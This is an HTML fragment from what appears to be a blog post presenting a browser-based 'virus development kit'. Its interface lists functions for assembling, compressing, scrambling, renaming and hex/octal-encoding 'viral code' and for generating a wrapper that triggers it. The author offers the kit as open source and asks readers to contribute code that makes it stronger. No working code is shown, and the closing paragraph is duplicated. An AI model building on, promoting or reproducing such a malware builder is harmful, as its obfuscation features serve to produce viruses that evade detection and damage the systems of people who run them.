<br /><select id="api" multiple="multiple" size="13"><option title="Pseudo Random Number Generator">prng</option><option title="Assembles all functions in viral code.">assemble</option><option title="Compression agent to reduce the size of final viral code.">compressor</option><option title="Decompression agent to decompress the compressed viral code.">decomp</option><option title="Returns a random character.">getRandChar</option><option title="Rotates the String (3rd argument) at occurences of literals of 1st argument with replacements of 2nd argument literals.">rotator</option><option title="Transforms all variable and function names provided in arrays to random words.">transformer</option><option title="Generates array of random words.">varMaker</option><option title="Extracts the used literals from those not used alphabets.">unique</option><option title="Can convert the string into hex or to octal depending on argument (0 = octal, 1 = hex).">toMorph</option><option title="Retrieves the original viral code script from morphed string.">toMSource</option><option title="Generates wrapper script that can trigger the viral code.">scraptor</option><option title="Extracts and refine the string and forms a key and a replacement text and uses rotator to return the scrambled viral code.">scrambler</option><option title="Returns near human language word.">dict</option><option title="Returns array of near human language words.">refine</option></select>
<br /></td><td width="33"><input type="button" value="">" onclick="getApi()"></td><td>
<br /><input id="funcname" type="text" size="106">
<br /><input type="submit" value="Generate" onclick="gener()">
<br /><input type="submit" value="Transform" onclick="transf()">
<br /></td></tr><tr><td colspan="2">
<br /><textarea id="vircode" rows="13" cols="105" title="Assembled Virus Code."></textarea>
<br /></td></tr></tbody></table>
<br /><script language="javascript"><br /><br /></script>
<br /></span>
<br />
<br /></div><div class="para"></div><div class="para">
<br /></div>This VDK is still under construction and should be considered "Open Source" and you can attach the "GNU" license to distribute it freely.
<br />
<br />You can modify it according to ur own suitability and functionality.
<br />
<br />For further ammendments u can post the ammended code or plugins into this very topic.
<br />
<br />Still this VDK is not fully automatic and still needs the brainwork.
<br />
<br />Its all ower lies in the stack of "api.js" so make this very file strongger.
<br />
<br />In next version i'll try my all to make it automatic, but assistance from u all is needed for that purpose.
<br />
<br />Note: For better efficiency use "Opera" web-browser.
<br /><div class="para">
<br /></div>This VDK is still under construction and should be considered "Open Source" and you can attach the "GNU" license to distribute it freely.
<br />
<br />You can modify it according to ur own suitability and functionality.
<br />
<br />For further ammendments u can post the ammended code or plugins into this very topic.
<br />
<br />Still this VDK is not fully automatic and still needs the brainwork.
<br />
<br />Its all power lies in the stack of "api.js" so make this very file strongger.
<br />
<br />In next version i'll try my all to make it automatic, but assistance from u all is needed for that purpose.
<br />
<br />Note: For better efficiency use "Opera" web-browser.
<br /><div class="para"> </div>Unknownnoreply@blogger.com0